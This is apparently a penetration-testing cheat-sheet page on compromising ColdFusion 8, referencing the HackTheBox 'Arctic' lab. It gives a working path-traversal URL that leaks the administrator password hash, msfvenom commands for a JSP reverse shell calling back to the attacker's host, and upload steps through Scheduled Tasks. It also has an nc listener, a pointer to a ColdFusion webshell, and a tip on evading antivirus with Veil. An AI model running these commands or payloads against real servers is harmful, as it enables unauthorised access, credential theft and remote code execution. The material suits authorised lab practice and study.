Coldfusion
Basics
REF: Arctic-HTB
Local File Inclusion - Password Leak!
Coldfusion 8 CVE
Get the Password hash using LFI
http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00enReverse Shell
If you get Admin into Coldfusion
You can upload a java reverse shell
Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp
Share:
python -m SimpleHTTPServer
python3 -m http.server
Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run
Execute:
http://$IP:8500/CFIDE/shell.jsp
Catch:
nc -nvlp 4444
whoami tolis!Webshell
If you get Admin into Coldfusion
You could upload "cfexec.cfm"
/usr/share/webshells/cfm/cfexec.cfm ..kali
Reverse Executable
You may be able to upload a reverse executable
Avoid AV detection with Veil
Other:
Also consider:
Last updated
Was this helpful?